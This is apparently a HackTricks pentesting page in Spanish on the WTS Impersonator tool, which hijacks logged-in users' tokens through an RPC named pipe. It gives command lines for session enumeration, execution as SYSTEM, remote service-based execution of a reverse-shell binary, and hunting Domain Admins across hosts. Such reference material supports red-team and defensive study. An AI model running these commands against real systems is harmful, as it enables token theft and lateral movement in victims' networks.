tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
La herramienta WTS Impersonator explota el "\pipe\LSM_API_service" RPC Named pipe para enumerar sigilosamente a los usuarios conectados y secuestrar sus tokens, eludiendo las técnicas tradicionales de Impersonación de Tokens. Este enfoque facilita movimientos laterales sin problemas dentro de las redes. La innovación detrás de esta técnica se atribuye a Omri Baso, cuyo trabajo es accesible en GitHub.
Funcionalidad Principal
La herramienta opera a través de una secuencia de llamadas a la API:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Módulos Clave y Uso
-
Enumerando Usuarios: La enumeración de usuarios locales y remotos es posible con la herramienta, utilizando comandos para cada escenario:
-
Localmente:
.\WTSImpersonator.exe -m enum
- Remotamente, especificando una dirección IP o nombre de host:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
-
Ejecutando Comandos: Los módulos
exec
yexec-remote
requieren un contexto de Servicio para funcionar. La ejecución local simplemente necesita el ejecutable WTSImpersonator y un comando: -
Ejemplo para la ejecución de comandos local:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe se puede usar para obtener un contexto de servicio:
.\PsExec64.exe -accepteula -s cmd.exe
-
Ejecución Remota de Comandos: Implica crear e instalar un servicio de forma remota similar a PsExec.exe, permitiendo la ejecución con los permisos apropiados.
-
Ejemplo de ejecución remota:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Módulo de Caza de Usuarios: Apunta a usuarios específicos en múltiples máquinas, ejecutando código bajo sus credenciales. Esto es especialmente útil para apuntar a Administradores de Dominio con derechos de administrador local en varios sistemas.
- Ejemplo de uso:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.